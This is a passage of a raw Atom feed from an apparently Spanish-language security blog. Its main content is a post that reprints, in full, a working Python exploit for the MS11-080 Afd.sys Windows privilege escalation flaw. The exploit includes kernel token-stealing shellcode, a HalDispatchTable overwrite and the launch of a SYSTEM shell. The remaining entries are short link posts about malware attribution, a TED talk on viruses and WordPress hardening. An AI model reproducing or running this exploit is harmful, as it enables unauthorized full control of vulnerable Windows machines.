&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nIupeLZZId1Ir-uXbzMsj8jg4O0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nIupeLZZId1Ir-uXbzMsj8jg4O0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nIupeLZZId1Ir-uXbzMsj8jg4O0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nIupeLZZId1Ir-uXbzMsj8jg4O0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/mjhEJmzlqkA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/8316634860277912401/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=8316634860277912401" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8316634860277912401?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8316634860277912401?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/mjhEJmzlqkA/las-amenazas-que-protagonizaran-2012.html" title="Las amenazas que protagonizarán 2012" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/12/las-amenazas-que-protagonizaran-2012.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0EEQ348cSp7ImA9WhRRFks.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-2777484113181806993</id><published>2011-11-30T10:12:00.000-06:00</published><updated>2011-11-30T10:13:22.079-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-30T10:13:22.079-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="exploit windows sp3 local esxploit remote exploit" /><title>MS11-080 Afd.sys Privilege Escalation</title><content type="html">################################################################################&lt;br /&gt;######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########&lt;br /&gt;#########         Author: ryujin@offsec.com - Matteo Memelli            ########&lt;br /&gt;#########                      Spaghetti &amp; Pwnsauce                     ########&lt;br /&gt;#########              yuck! 0xbaadf00d Elwood@mac&amp;cheese.com           ########&lt;br /&gt;#########                                                               ########&lt;br /&gt;#########      Thx to dookie(lifesaver)2000ca, dijital1 and ronin       ########&lt;br /&gt;#########                        for helping out!                       ########&lt;br /&gt;#########                                                               ########&lt;br /&gt;#########                   To my Master Shifu muts:                    ########&lt;br /&gt;#########           "So that's it, I just need inner peace?" ;)         ########&lt;br /&gt;#########                                                               ########&lt;br /&gt;#########        Exploit tested on the following 32bits systems:        ########&lt;br /&gt;#########       Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng       ########&lt;br /&gt;################################################################################&lt;br /&gt; &lt;br /&gt;from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,&lt;br /&gt;                    c_char, c_short, c_ushort, c_int, c_uint, c_ulong,&lt;br /&gt;                    c_void_p, c_long, c_char_p)&lt;br /&gt;from ctypes.wintypes import HANDLE, DWORD&lt;br /&gt;import socket, time, os, struct, sys&lt;br /&gt;from optparse import OptionParser&lt;br /&gt; &lt;br /&gt;usage =  "%prog -O TARGET_OS"&lt;br /&gt;parser = OptionParser(usage=usage)&lt;br /&gt;parser.add_option("-O", "--target-os", type="string",&lt;br /&gt;                  action="store", dest="target_os",&lt;br /&gt;                  help="Target OS. Accepted values: XP, 2K3")&lt;br /&gt;(options, args) = parser.parse_args()&lt;br /&gt;OS = options.target_os&lt;br /&gt;if not OS or OS.upper() not in ['XP','2K3']:&lt;br /&gt;   parser.print_help()&lt;br /&gt;   sys.exit()&lt;br /&gt;OS = OS.upper()&lt;br /&gt; &lt;br /&gt;kernel32 = windll.kernel32&lt;br /&gt;ntdll    = windll.ntdll&lt;br /&gt;Psapi    = windll.Psapi&lt;br /&gt; &lt;br /&gt;def findSysBase(drvname=None):&lt;br /&gt;    ARRAY_SIZE            = 1024&lt;br /&gt;    myarray               = c_ulong * ARRAY_SIZE &lt;br /&gt;    lpImageBase           = myarray() &lt;br /&gt;    cb                    = c_int(1024) &lt;br /&gt;    lpcbNeeded            = c_long() &lt;br /&gt;    drivername_size       = c_long() &lt;br /&gt;    drivername_size.value = 48&lt;br /&gt;    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) &lt;br /&gt;    for baseaddy in lpImageBase: &lt;br /&gt;        drivername = c_char_p("\x00"*drivername_size.value) &lt;br /&gt;        if baseaddy: &lt;br /&gt;            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, &lt;br /&gt;                            drivername_size.value)&lt;br /&gt;            if drvname:&lt;br /&gt;                if drivername.value.lower() == drvname:&lt;br /&gt;                    print "[+] Retrieving %s info..." % drvname&lt;br /&gt;                    print "[+] %s base address: %s" % (drvname, hex(baseaddy))&lt;br /&gt;                    return baseaddy&lt;br /&gt;            else:&lt;br /&gt;                if drivername.value.lower().find("krnl") !=-1:&lt;br /&gt;                    print "[+] Retrieving Kernel info..."&lt;br /&gt;                    print "[+] Kernel version:", drivername.value&lt;br /&gt;                    print "[+] Kernel base address: %s" % hex(baseaddy) &lt;br /&gt;                    return (baseaddy, drivername.value)&lt;br /&gt;    return None&lt;br /&gt; &lt;br /&gt;print "[&gt;] MS11-080 Privilege Escalation Exploit"&lt;br /&gt;print "[&gt;] Matteo Memelli - ryujin@offsec.com"&lt;br /&gt;print "[&gt;] Release Date 28/11/2011"&lt;br /&gt; &lt;br /&gt;WSAGetLastError          = windll.Ws2_32.WSAGetLastError&lt;br /&gt;WSAGetLastError.argtypes = ()&lt;br /&gt;WSAGetLastError.restype  = c_int&lt;br /&gt;SOCKET                   = c_int&lt;br /&gt;WSASocket                = windll.Ws2_32.WSASocketA&lt;br /&gt;WSASocket.argtypes       = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)&lt;br /&gt;WSASocket.restype        = SOCKET&lt;br /&gt;closesocket              = windll.Ws2_32.closesocket&lt;br /&gt;closesocket.argtypes     = (SOCKET,)&lt;br /&gt;closesocket.restype      = c_int&lt;br /&gt;connect                  = windll.Ws2_32.connect&lt;br /&gt;connect.argtypes         = (SOCKET, c_void_p, c_int)&lt;br /&gt;connect.restype          = c_int&lt;br /&gt; &lt;br /&gt;class sockaddr_in(Structure):&lt;br /&gt;    _fields_ = [&lt;br /&gt;        ("sin_family", c_short),&lt;br /&gt;        ("sin_port", c_ushort),&lt;br /&gt;        ("sin_addr", c_ulong),&lt;br /&gt;        ("sin_zero", c_char * 8),&lt;br /&gt;        ]&lt;br /&gt; &lt;br /&gt;## Create our deviceiocontrol socket handle&lt;br /&gt;client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,&lt;br /&gt;                   None, 0, 0)&lt;br /&gt;if client == ~0:&lt;br /&gt;    raise OSError, "WSASocket: %s" % (WSAGetLastError(),)&lt;br /&gt;try:&lt;br /&gt;    addr = sockaddr_in()&lt;br /&gt;    addr.sin_family = socket.AF_INET&lt;br /&gt;    addr.sin_port = socket.htons(4455)&lt;br /&gt;    addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1&lt;br /&gt;    ## We need to connect to a closed port, socket state must be CONNECTING&lt;br /&gt;    connect(client, byref(addr), sizeof(addr))&lt;br /&gt;except:&lt;br /&gt;    closesocket(client)&lt;br /&gt;    raise&lt;br /&gt; &lt;br /&gt;baseadd    = c_int(0x1001)&lt;br /&gt;MEMRES     = (0x1000 | 0x2000)&lt;br /&gt;PAGEEXE    = 0x00000040&lt;br /&gt;Zerobits   = c_int(0)&lt;br /&gt;RegionSize = c_int(0x1000)&lt;br /&gt;written    = c_int(0)&lt;br /&gt;## This will trigger the path to AfdRestartJoin&lt;br /&gt;irpstuff   = ("\x41\x41\x41\x41\x42\x42\x42\x42"&lt;br /&gt;              "\x00\x00\x00\x00\x44\x44\x44\x44"&lt;br /&gt;              "\x01\x00\x00\x00"&lt;br /&gt;              "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)&lt;br /&gt;## Allocate space for the input buffer&lt;br /&gt;dwStatus = ntdll.NtAllocateVirtualMemory(-1,&lt;br /&gt;                                     byref(baseadd),&lt;br /&gt;                                     0x0,&lt;br /&gt;                                     byref(RegionSize),&lt;br /&gt;                                     MEMRES,&lt;br /&gt;                                     PAGEEXE)&lt;br /&gt;# Copy input buffer to it&lt;br /&gt;kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))&lt;br /&gt;startPage = c_int(0x00020000)&lt;br /&gt;kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))&lt;br /&gt;################################# KERNEL INFO ##################################&lt;br /&gt;lpDriver     = c_char_p()&lt;br /&gt;lpPath       = c_char_p()&lt;br /&gt;lpDrvAddress = c_long()&lt;br /&gt;(krnlbase, kernelver) = findSysBase()&lt;br /&gt;hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)&lt;br /&gt;HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")&lt;br /&gt;HalDispatchTable -= hKernel&lt;br /&gt;HalDispatchTable += krnlbase&lt;br /&gt;print "[+] HalDispatchTable address:", hex(HalDispatchTable)&lt;br /&gt;halbase = findSysBase("hal.dll")&lt;br /&gt;## WinXP SP3&lt;br /&gt;if OS == "XP":&lt;br /&gt;    HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3&lt;br /&gt;    HalpSetSystemInformation   = halbase+0x19436 # Offset for XPSP3&lt;br /&gt;## Win2k3 SP2&lt;br /&gt;else:&lt;br /&gt;    HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3&lt;br /&gt;    HalpSetSystemInformation   = halbase+0x21c60 # Offset for WIN2K3&lt;br /&gt;print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)&lt;br /&gt;print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)&lt;br /&gt; &lt;br /&gt;################################# EXPLOITATION #################################&lt;br /&gt;shellcode_address_dep   = 0x0002071e&lt;br /&gt;shellcode_address_nodep = 0x000207b8&lt;br /&gt;padding           = "\x90"*2&lt;br /&gt;HalDispatchTable0x4 = HalDispatchTable + 0x4&lt;br /&gt;HalDispatchTable0x8 = HalDispatchTable + 0x8&lt;br /&gt;## tokenbkaddr      = 0x00020900&lt;br /&gt;if OS == "XP":&lt;br /&gt;    _KPROCESS = "\x44"&lt;br /&gt;    _TOKEN    = "\xc8"&lt;br /&gt;    _UPID     = "\x84"&lt;br /&gt;    _APLINKS  = "\x88"&lt;br /&gt;else:&lt;br /&gt;    _KPROCESS = "\x38"&lt;br /&gt;    _TOKEN    = "\xd8"&lt;br /&gt;    _UPID     = "\x94"&lt;br /&gt;    _APLINKS  = "\x98"&lt;br /&gt;     &lt;br /&gt;restore_ptrs =   "\x31\xc0" + \&lt;br /&gt;                 "\xb8" + struct.pack("L", HalpSetSystemInformation) + \&lt;br /&gt;                 "\xa3" + struct.pack("L", HalDispatchTable0x8) + \&lt;br /&gt;                 "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \&lt;br /&gt;                 "\xa3" + struct.pack("L", HalDispatchTable0x4)&lt;br /&gt;tokenstealing =  "\x52"                                 +\&lt;br /&gt;                 "\x53"                                 +\&lt;br /&gt;                 "\x33\xc0"                             +\&lt;br /&gt;                 "\x64\x8b\x80\x24\x01\x00\x00"         +\&lt;br /&gt;                 "\x8b\x40" + _KPROCESS                 +\&lt;br /&gt;                 "\x8b\xc8"                             +\&lt;br /&gt;                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\&lt;br /&gt;                 "\x89\x1d\x00\x09\x02\x00"             +\&lt;br /&gt;                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\&lt;br /&gt;                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\&lt;br /&gt;                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\&lt;br /&gt;                 "\x75\xe8"                             +\&lt;br /&gt;                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\&lt;br /&gt;                 "\x8b\xc1"                             +\&lt;br /&gt;                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\&lt;br /&gt;                 "\x5b"                                 +\&lt;br /&gt;                 "\x5a"                                 +\&lt;br /&gt;                 "\xc2\x10"&lt;br /&gt;restore_token =  "\x52"                                 +\&lt;br /&gt;                 "\x33\xc0"                             +\&lt;br /&gt;                 "\x64\x8b\x80\x24\x01\x00\x00"         +\&lt;br /&gt;                 "\x8b\x40" + _KPROCESS                 +\&lt;br /&gt;                 "\x8b\x15\x00\x09\x02\x00"             +\&lt;br /&gt;                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\&lt;br /&gt;                 "\x5a"                                 +\&lt;br /&gt;                 "\xc2\x10"&lt;br /&gt;                  &lt;br /&gt;shellcode         = padding + restore_ptrs + tokenstealing&lt;br /&gt;shellcode_size    = len(shellcode)&lt;br /&gt;orig_size         = shellcode_size&lt;br /&gt;# Write shellcode in userspace (dep)&lt;br /&gt;kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,&lt;br /&gt;                                   shellcode_size, byref(written))&lt;br /&gt;# Write shellcode in userspace *(nodep)&lt;br /&gt;kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,&lt;br /&gt;                                   shellcode_size, byref(written))&lt;br /&gt;## Trigger Pointer Overwrite&lt;br /&gt;print "[*] Triggering AFDJoinLeaf pointer overwrite..."&lt;br /&gt;IOCTL             = 0x000120bb                # AFDJoinLeaf&lt;br /&gt;inputbuffer       = 0x1004&lt;br /&gt;inputbuffer_size  = 0x108&lt;br /&gt;outputbuffer_size = 0x0                       # Bypass Probe for Write&lt;br /&gt;outputbuffer      = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1&lt;br /&gt;IoStatusBlock = c_ulong()&lt;br /&gt;NTSTATUS = ntdll.ZwDeviceIoControlFile(client,&lt;br /&gt;                                       None,&lt;br /&gt;                                       None,&lt;br /&gt;                                       None,&lt;br /&gt;                                       byref(IoStatusBlock),&lt;br /&gt;                                       IOCTL,&lt;br /&gt;                                       inputbuffer,&lt;br /&gt;                                       inputbuffer_size,&lt;br /&gt;                                       outputbuffer,&lt;br /&gt;                                       outputbuffer_size&lt;br /&gt;                                       )&lt;br /&gt;## Trigger shellcode&lt;br /&gt;inp  = c_ulong()&lt;br /&gt;out  = c_ulong()&lt;br /&gt;inp  = 0x1337&lt;br /&gt;hola = ntdll.NtQueryIntervalProfile(inp, byref(out))&lt;br /&gt;## Spawn a system shell, w00t!&lt;br /&gt;print "[*] Spawning a SYSTEM shell..."&lt;br /&gt;os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")&lt;br /&gt; &lt;br /&gt;############################## POST EXPLOITATION ###############################&lt;br /&gt;print "[*] Restoring token..."&lt;br /&gt;## Restore the thingie&lt;br /&gt;shellcode         = padding + restore_ptrs + restore_token&lt;br /&gt;shellcode_size    = len(shellcode)&lt;br /&gt;trail_padding     = (orig_size - shellcode_size) * "\x00"&lt;br /&gt;shellcode        += trail_padding&lt;br /&gt;shellcode_size   += (orig_size - shellcode_size)&lt;br /&gt;## Write restore shellcode in userspace (dep)&lt;br /&gt;kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,&lt;br /&gt;                                   shellcode_size, byref(written))&lt;br /&gt;## Write restore shellcode in userspace (nodep)&lt;br /&gt;kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,&lt;br /&gt;                                   shellcode_size, byref(written))&lt;br /&gt;## Overwrite HalDispatchTable once again&lt;br /&gt;NTSTATUS = ntdll.ZwDeviceIoControlFile(client,&lt;br /&gt;                                       None,&lt;br /&gt;                                       None,&lt;br /&gt;                                       None,&lt;br /&gt;                                       byref(IoStatusBlock),&lt;br /&gt;                                       IOCTL,&lt;br /&gt;                                       inputbuffer,&lt;br /&gt;                                       inputbuffer_size,&lt;br /&gt;                                       outputbuffer,&lt;br /&gt;                                       outputbuffer_size&lt;br /&gt;                                       )&lt;br /&gt;## Trigger restore shellcode&lt;br /&gt;hola = ntdll.NtQueryIntervalProfile(inp, byref(out))&lt;br /&gt;print "[+] Restore done! Have a nice day :)"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2777484113181806993?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PJzWrhPeMm4g69zIM6TgNmnwRx4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PJzWrhPeMm4g69zIM6TgNmnwRx4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PJzWrhPeMm4g69zIM6TgNmnwRx4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PJzWrhPeMm4g69zIM6TgNmnwRx4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/hVPbdtnrkDo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/2777484113181806993/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=2777484113181806993" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2777484113181806993?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2777484113181806993?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/hVPbdtnrkDo/ms11-080-afdsys-privilege-escalation.html" title="MS11-080 Afd.sys Privilege Escalation" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/ms11-080-afdsys-privilege-escalation.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YASXgyeSp7ImA9WhRSFk4.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-2973846247750281763</id><published>2011-11-18T11:59:00.000-06:00</published><updated>2011-11-18T11:59:08.691-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-18T11:59:08.691-06:00</app:edited><title>Security By Default: Buscando el país de origen de un malware</title><content type="html">&lt;a href="http://www.securitybydefault.com/2011/11/buscando-el-pais-de-origen-de-un.html"&gt;Security By Default: Buscando el país de origen de un malware&lt;/a&gt;: "Cuando aparece un nuevo malware muchas veces leemos en documentos técnicos de compañías antivirus en qué país se ha creado, pero ¿cómo lo saben?, con esta entrada pretendo explicar de dónde sale esta información. Para entender el ejercicio, se va a utilizar una muestra del malware Noppuca.&lt;br /&gt;"&lt;br&gt;&lt;br&gt;&lt;a style="font-size:13px" href="https://chrome.google.com/webstore/detail/pengoopmcjnbflcjbmoeodbmoflcgjlk"&gt;'via Blog this'&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2973846247750281763?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/kLtm2S258pC_DMg5fFesXUQzH9c/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/kLtm2S258pC_DMg5fFesXUQzH9c/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/kLtm2S258pC_DMg5fFesXUQzH9c/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/kLtm2S258pC_DMg5fFesXUQzH9c/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/tFaN4mJzcVk" height="1" width="1"/&gt;</content><link rel="related" href="http://www.securitybydefault.com/2011/11/buscando-el-pais-de-origen-de-un.html" title="Security By Default: Buscando el país de origen de un malware" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/2973846247750281763/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=2973846247750281763" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2973846247750281763?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2973846247750281763?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/tFaN4mJzcVk/security-by-default-buscando-el-pais-de.html" title="Security By Default: Buscando el país de origen de un malware" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/security-by-default-buscando-el-pais-de.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUcDQH04eip7ImA9WhRSFUk.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-787063573580117850</id><published>2011-11-17T09:05:00.017-06:00</published><updated>2011-11-17T09:17:51.332-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-17T09:17:51.332-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="virus" /><category scheme="http://www.blogger.com/atom/ns#" term="historia de los virus" /><category scheme="http://www.blogger.com/atom/ns#" term="25 años virus" /><category scheme="http://www.blogger.com/atom/ns#" term="defendiendo la internet" /><title>25 Años de virus</title><content type="html">Excelente video =) lo recomiendo totalmente.&lt;br /&gt;&lt;br /&gt;http://www.ted.com/talks/view/lang/es//id/1192&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="526" height="374"&gt;&lt;br /&gt;&lt;param name="movie" value="http://video.ted.com/assets/player/swf/EmbedPlayer.swf"&gt;&lt;/param&gt;&lt;br /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;br /&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;br /&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;br /&gt;&lt;param name="bgColor" value="#ffffff"&gt;&lt;/param&gt;&lt;br /&gt;&lt;param name="flashvars" value="vu=http://video.ted.com/talk/stream/2011G/Blank/MikkoHypponen_2011G-320k.mp4&amp;su=http://images.ted.com/images/ted/tedindex/embed-posters/MikkoHypponen-2011G.embed_thumbnail.jpg&amp;vw=512&amp;vh=288&amp;ap=0&amp;ti=1192&amp;lang=es&amp;introDuration=15330&amp;adDuration=4000&amp;postAdDuration=830&amp;adKeys=talk=mikko_hypponen_fighting_viruses_defending_the_net;year=2011;theme=bold_predictions_stern_warnings;theme=what_s_next_in_tech;event=TEDGlobal+2011;tag=Global+Issues;tag=Technology;tag=computers;tag=crime;tag=internet;tag=virus;&amp;preAdTag=tconf.ted/embed;tile=1;sz=512x288;" /&gt;&lt;br /&gt;&lt;embed src="http://video.ted.com/assets/player/swf/EmbedPlayer.swf" pluginspace="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" bgColor="#ffffff" width="500" height="374" allowFullScreen="true" allowScriptAccess="always" flashvars="vu=http://video.ted.com/talk/stream/2011G/Blank/MikkoHypponen_2011G-320k.mp4&amp;su=http://images.ted.com/images/ted/tedindex/embed-posters/MikkoHypponen-2011G.embed_thumbnail.jpg&amp;vw=512&amp;vh=288&amp;ap=0&amp;ti=1192&amp;lang=es&amp;introDuration=15330&amp;adDuration=4000&amp;postAdDuration=830&amp;adKeys=talk=mikko_hypponen_fighting_viruses_defending_the_net;year=2011;theme=bold_predictions_stern_warnings;theme=what_s_next_in_tech;event=TEDGlobal+2011;tag=Global+Issues;tag=Technology;tag=computers;tag=crime;tag=internet;tag=virus;&amp;preAdTag=tconf.ted/embed;tile=1;sz=512x288;"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-787063573580117850?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Z7enwzrzUJYhJIVfG79eRQXxbxg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Z7enwzrzUJYhJIVfG79eRQXxbxg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Z7enwzrzUJYhJIVfG79eRQXxbxg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Z7enwzrzUJYhJIVfG79eRQXxbxg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/3rVTyyuanlA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/787063573580117850/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=787063573580117850" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/787063573580117850?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/787063573580117850?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/3rVTyyuanlA/25-anos-de-virus.html" title="25 Años de virus" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/25-anos-de-virus.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEQARnw-cCp7ImA9WhRSFEs.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-3685929763929899752</id><published>2011-11-16T10:52:00.001-06:00</published><updated>2011-11-16T10:52:27.258-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-16T10:52:27.258-06:00</app:edited><title>Security By Default: Tu WordPress intocable con Mutex</title><content type="html">&lt;a href="http://www.securitybydefault.com/2011/11/tu-wordpress-intocable-con-mutex.html"&gt;Security By Default: Tu WordPress intocable con Mutex&lt;/a&gt;: "La cantidad de ataques y exploits que se publican para WordPress es bastante considerable, hace poco hubo un 'deface masivo' de blogs que afectó a más de 2.500 sitios que tenían como denominador común WordPress + Plugin defectuoso.&lt;br /&gt;&lt;br /&gt;Por aquí ya hablamos sobre 'PhpIds', un proyecto que tiene como misión desarrollar una librería para bloquear amenazas en proyectos escritos en PHP, de forma que permita fácilmente a un desarrollador añadir una capa de defensa en sus aplicaciones web.&lt;br /&gt;&lt;br /&gt;PhpIds bloquea ataques de tipo XSS, SQLI o RFI&lt;br /&gt;&lt;br /&gt;También existe un proyecto similar para Perl"&lt;br&gt;&lt;br&gt;&lt;a style="font-size:13px" href="https://chrome.google.com/webstore/detail/pengoopmcjnbflcjbmoeodbmoflcgjlk"&gt;'via Blog this'&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-3685929763929899752?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/6Ta2-QXnVS6iinuE02r9ojOkTtc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6Ta2-QXnVS6iinuE02r9ojOkTtc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
